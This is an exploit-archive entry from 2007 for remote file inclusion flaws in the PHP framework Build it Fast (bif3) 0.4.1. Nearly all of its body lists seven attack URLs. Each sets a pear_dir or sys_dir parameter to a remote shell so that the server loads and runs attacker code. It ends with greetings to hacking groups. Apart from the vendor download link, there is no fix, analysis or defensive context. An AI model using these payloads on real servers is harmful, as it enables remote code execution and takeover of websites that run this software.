id: 1887
date: 05/16/2007
title: Build it Fast (bif3) 0.4.1 Multiple Remote File Inclusion Vulnerabilities
author: Alkomandoz Hacker
cves: 

=========================================================================
Build it Fast (bif3) 0.4.1 Multiple Remote File Inclusion Vulnerabilities
=========================================================================


# bif3-0.4.1 <=  Remote File Include Vulnerablitiy

# D.Script: http://bif.lunix.com.ar/tgz/bif3-0.4.1.tgz

# Discovered by: Alkomandoz Hacker


====================================
# Exploit:[Path]/Base/Application.php?pear_dir=Shell
# Exploit:[Path]/Widgets/Base/Footer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifContainer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot2.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot3.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifWarning.php?sys_dir=Shell
====================================

# Thanx:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team

# Greetz To: Sniper_Sa & Devil-X



#  0day.today [2023-03-22]  #